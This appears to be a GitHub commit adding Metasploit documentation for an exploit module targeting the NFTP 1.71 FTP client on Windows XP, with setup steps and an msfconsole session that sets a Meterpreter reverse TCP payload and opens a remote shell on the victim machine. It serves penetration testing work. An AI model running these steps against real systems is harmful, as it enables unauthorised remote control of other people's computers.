Skip to content

Commit 76d3450

Browse files
Create ayukov_nftp.md
1 parent 2b96f8e commit 76d3450

File tree

1 file changed

+36
-0
lines changed

1 file changed

+36
-0
lines changed
Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
## Vulnerable Application
2+
3+
Tested on Windows XP Professional SP3 EN
4+
5+
Install the application from the link below.
6+
7+
[NFTP 1.71](https://www.exploit-db.com/apps/a766d928899200ed6a21f7c790b5cbe5-nftp-1.71-i386-win32.exe)
8+
9+
## Verification Steps
10+
11+
1. Install the application
12+
2. Start msfconsole
13+
3. Do: ```use exploit/windows/ftp/ayukov_nftp```
14+
4. Set options and payload
15+
5. Do: ```exploit```
16+
6. Connect to the FTP server using the NFTP FTP client
17+
6. You should get a shell
18+
19+
## Scenarios
20+
21+
To obtain a shell:
22+
23+
```
24+
msf > use exploit/windows/ftp/ayukov_nftp
25+
msf exploit(windows/ftp/ayukov_nftp) > set PAYLOAD windows/meterpreter/reverse_tcp
26+
PAYLOAD => windows/meterpreter/reverse_tcp
27+
msf exploit(windows/ftp/ayukov_nftp) > set LHOST 192.168.216.5
28+
LHOST => 192.168.216.5
29+
msf exploit(windows/ftp/ayukov_nftp) > exploit
30+
[*] Exploit running as background job 0.
31+
32+
[*] Started reverse TCP handler on 192.168.216.5:4444
33+
msf exploit(windows/ftp/ayukov_nftp) > [*] Server started.
34+
[*] Sending stage (179779 bytes) to 192.168.216.156
35+
[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.156:1046) at 2017-12-31 10:05:50 -0500
36+
```

0 commit comments

Comments
 (0)